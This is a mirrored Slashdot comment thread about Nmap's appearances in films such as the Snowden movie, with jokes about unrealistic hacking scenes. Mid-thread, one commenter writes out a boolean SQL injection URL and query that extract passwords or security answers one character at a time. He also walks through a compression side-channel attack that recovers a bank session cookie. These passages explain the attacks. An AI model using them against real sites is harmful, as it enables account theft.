Slashdot Mirror
More Code In Movies: Nmap Meets Snowden (nmap.org)
After Saturday's story about the code samples in the new movie Arrival, an anonymous reader reminded us of this classic essay at Nmap.org:
For reasons unknown, Hollywood has decided that Nmap is the tool to show whenever hacking scenes are needed... While Nmap had been used in some previous obscure movies, it was The Matrix Reloaded which really turned Nmap into a movie star!
Nmap.org has a tradition -- the first person to notify them when new Nmap appears in a new movie wins a signed copy of Nmap Network Scanning "or a T-shirt of your choice from the Zero Day Clothing Nmap Store." (The site adds that "movie script writers, artists, and digital asset managers are also welcome to email Fyodor for advice.") And Nmap.org just added another film, Oliver Stone's new movie about Edward Snowden. In one early scene, Snowden is given a network security challenge at a CIA training class which is expected to take 5 to 8 hours. But with the help Nmap and a custom Nmap NSE script named ptest.nse, Snowden stuns the professor by completing everything in 38 minutes!
According to the site, even the movie's trailer features Nmap. Anybody else have their own favorite stories about code in the movies?
Nmap.org has a tradition -- the first person to notify them when new Nmap appears in a new movie wins a signed copy of Nmap Network Scanning "or a T-shirt of your choice from the Zero Day Clothing Nmap Store." (The site adds that "movie script writers, artists, and digital asset managers are also welcome to email Fyodor for advice.") And Nmap.org just added another film, Oliver Stone's new movie about Edward Snowden. In one early scene, Snowden is given a network security challenge at a CIA training class which is expected to take 5 to 8 hours. But with the help Nmap and a custom Nmap NSE script named ptest.nse, Snowden stuns the professor by completing everything in 38 minutes!
According to the site, even the movie's trailer features Nmap. Anybody else have their own favorite stories about code in the movies?
but can nmap hack the gibson?
Someone could require to release the movies under the GPL
>running nmap
>what is this computer shit
>ahh, it must be
>
>code!!1
The other reason for choosing LISP is that aliens would have a better chance of understanding it. Being based on the Lambda Calculus. it represents a fundamental understanding of the theory of computation. It is likely that other intelligent species would recognize it. It's unclear that C or C++ show that any intelligent life exists on earth.
Why is Snark Required?
... a bank transfer with a progress bar that takes minutes.
In the movie Blackhat there's a screen where a hex editor is used to analyze some malware code. The hex code is just random nonsense, but the ASCII conversion contains lines from an erotic novel, but with each word reversed
Here's a screenshot:
http://imgur.com/VIWNahL
The text on the right says
Her lover one day takes O for a walk ....
in a section of the city where they never go the Montsouris Park. After they have taken a stroll in the park, and have sat together side by side on the edge of a lawn, they notice at one corner of the park, at an intersection where there are never any taxis, a car which, because
--
which comes from this:
https://archive.org/stream/The... ... O_djvu.txt
---- El diablo esta en mis pantalones! Mire, mire!
You forgot:
*** Cracking a password one character at a time until all the characters are filled in. Nope, passwords are an all or nothing proposition.
*** Hacking/coding as a real-time activity (e.g. furiously typing code to block another hacker in real-time). Actual programmers roll their eyes here, knowing how painfully slow writing and testing code is in real life.
(albeit boring as fuck) scenes and sequences.
Aaaand, you just hit on why Hollywood doesn't show reality. Reality tends to be boring as fuck 99.9% of the time. Movies are (typically) meant to entertain people, not educate them. That tends to be a bit of a problem when idiots can't distinguish Hollywood from reality, but what are you going to do? It typically hits home when Hollywood delves into a topic that the viewer knows very well, and they leave the theater thinking "couldn't they have just asked a professional _____ about those scenes?"
Irony: Agile development has too much intertia to be abandoned now.
Well, duh, it takes a while for really large transfers. I mean, that's a lot of digital money to move through those internet pipes, right?
Irony: Agile development has too much intertia to be abandoned now.
> ** Cracking a password one character at a time until all the characters are filled in. Nope, passwords are an all or nothing proposition.
Many attacks against passwords/keys are character-at-a-time. All types of padding oracle attacks are character-at-a-time, as are sql injection with results determined by the presence or absence of an error. (where password like 'a%'). Padding oracle attacks include POODLE and Lucky Thirteen.
> *** Hacking/coding as a real-time activity (e.g. furiously typing code to block another hacker in real-time)
I've done that, when I became aware of a breach due to what the attacker was doing at the moment, and I had only remote access so I couldn't pull the network cable.
Here's a specific example of hacking a password one character at a time, with details of how it's done.
Like most message boards, you can see my profile by going to:
slashdot.org/~raymorris
With many scripts, the profile url ends with ?userid=123
If you're a programmer, you know that's likely to be implemented with a line of code like this:
SELECT * FROM users WHERE userid='$input'
That ends up running:
SELECT * FROM users WHERE userid='raymorris'
Note that you get an error message if the username doesn't exist.
To hack someone's password, we use this URL:
slashdot.org/~raymorris'+ AND+password+LIKE+'a%
Which runs this SQL:
SELECT * FROM users WHERE userid='raymorris' AND password LIKE 'a%'
As always, if that matches a user it will show their profile. If no user is found by the SQL, the page shows an error.
We try each character until we don't get an error. Suppose "J" shows the profile. We know the first character of the password is J. So we load up:
slashdot.org/~raymorris'+ AND+password+LIKE+'Ja%
Voila, cracking passwords one character at a time. Works on many systems that havev databases on the backend.
Suppose the coder is knowledgeable enough that they used salted hashes of the passwords. No problem, we just use:
slashdot.org/~raymorris'+ AND+forgot-pwd-answer+LIKE+'a%
If the site has a "forgot your password?" feature where you answer a question like "what was your first pet's name?", the name of the pet is effectively an alternate password, and it's unlikely to be hashed.
*** "enhance!" (+ rinse and repeat)to blow up a single pixel of a reflection in a car's side mirror captured by a fuzzy analog security cam into a glorious full hd image.. nope. that's even worse
Turns out that ones kind of working now.
https://github.com/alexjc/neur...
It's ok if the results are printed using Kryten's butt printer... then you're really pulling it out of someone's ass.
...si hoc legere nimium eruditionis habes...
That scene was entertaining.
I think I was unclear. I'm NOT talking about brute force. I'm taking about finding the first character, then several seconds later cracking the second character, then several more seconds to get the third character, etc. Here's a step by step for one easy example, a boolean return SQLi:
https://slashdot.org/comments....
Padding oracle attacks are the same - you find the first character, then you find the second character, etc. Here's a rough description of one other similar example:
As is/was common for https traffic, traffic compressed with gzip and encrypted. This string compresses well:
Cookie:abcabcabc
This one compresses poorly:
Cookie:abfkdgrkdgs
Assume the cookie is an access cookie for your bank. Seeing the encrypted traffic, I can't read it, but I can see how big it is. Using Javascript, I put an img tag on our web page for each of these URLs:
bank.com/Cookie:a
bank.com/Cookie:b
bank.com/Cookie:c
Your browser creates, compresses, and encrypts the following requests:
Get /Cookie:a
Cookie:bfjshdhd
Get /Cookie:b
Cookie:bfjshdhd
Get /Cookie:c
Cookie:bfjshdhd
Since they are encrypted I, as an attacker can't read the requests to get your session cookie. However I can see how big the request is, after compression. You'll notice the second request contains the repeated string "Cookie:b". Since it's an exact repeat, it will compress better than the others, and I as an attacker nkw know the first character of your authentication cookie. My Javascript then repeats with:
Get /Cookie:ba
Cookie:bfjshdhd
Get /Cookie:bb
Cookie:bfjshdhd
Get /Cookie:bc ...
Cookie:bfjshdhd
Voila, I get your authentication cookie (effectively a password) one character at a time.
Yes, I do hack banks and other "secure" sites for a living.
Try reading the post before criticizing it and you might not make a complete fool out yourself again. Try reading the last three sentences or so starting with "if the password is hashed".
mame was in godzilla 2000
I hate when they "type" code sequentially, top to bottom in a single stream. Sure, you might write a stupid simple shell script that way, but not C, C++, or Java.
John
We already have the Wilhelm scream that has appeared in countless movies as a kind of insider joke/cameo (including all Star Wars movies to date), so why not have the "Fyodor Code" as well?
UNIX? They're not even circumcised! Savages!
Someone cared.
In Visual Basic.
I knew I needed to stop reading Slashdot and finish my PhD when I started to miss articles by Bennett Haselton.
I had a pleasant time in line doing a code review.
Moss is that you?
lucm, indeed.
dongles
TRIGGER WARNING PLEASE
lucm, indeed.
Showing a program operate almost certainly does not make that movie a derivative work...
Yeah and never a single copy-paste from StackOverflow.
lucm, indeed.
The attack I just described gets the cookie, it doesn't require CSRF, and will get the cookie for most any site.
Note the URLs used are all 404, they don't exist. CSRF would be causing the browser to load a legitimate and important URL like change-password.php?newpass=hacked
I have not seen the movie but a bank transfer with a progress bar that takes minutes does not sound unrealistic. Banking systems are highly distributed and need a high level assurance/consistency. Not so long ago an actual (inter-bank) transfer (e.g. within Germany) would only be done overnight, hours after it has been booked internally. The progress bar could represent all the different synchronization steps ...
Most of the time, when they want to show something "happening" it always seems like it is one of the following:
1. Cat of some text file, log or source code on a semi transparent console window
2. Custom script of output text (hello world type of thing) also on the transparent console window
3. Some custom GUI using Tk or Qt windows that open and close very fast and at least one progress bar
4. A map that zooms in/out
5. An image or video
Also, during any of these, the "hacker" is seen to be typing away madly at the keyboard but somehow doesn't seem to be using any key modifiers (CTRL, ALT, SHIFT) and doesn't appear to be directly affecting anything seen on the screen.
I am also amazed that people who are pressed for time (the owner of the computer is about to walk in the door) always seem to know exactly what they are doing even though they have (presumably) never seen this computer/software. I know if it was me, I would go to put in my USB thumb drive and find that the IT staff hot glued the port or the local AV is blocking the file transfer or it is a USB-C and I don't have an adapter so I try to e-mail it to myself but the e-mail program is password protected so I try to use web based mail, but my 2FA blocks access from this device so I have to dig out my phone, but I have no service so I try to connect to an open WiFi hotspot, but there is something wrong with it and I am not getting an IP address or the authentication gateway is broken..... and I'm caught by the guy walking in the door....
My eyes reflect the stars and a smile lights up my face.
What? Don't guns always make ktcht sounds whenever moved more than 2 centimeters in any direction?
My eyes reflect the stars and a smile lights up my face.
If you're wondering how he eats and breathes And other science facts, Just repeat to yourself "It's just a show, I should really just relax ...
If it was in the 80's, maybe. All those transfers were sent to the fed via (hardware encrypted) 56k lines. So it might've actually taken 10sec.
sun4m (M as in monkey, not U) and it also says "i386". So which is it? (very likely the latter) And it's clearly linux from the obscured names in the process list.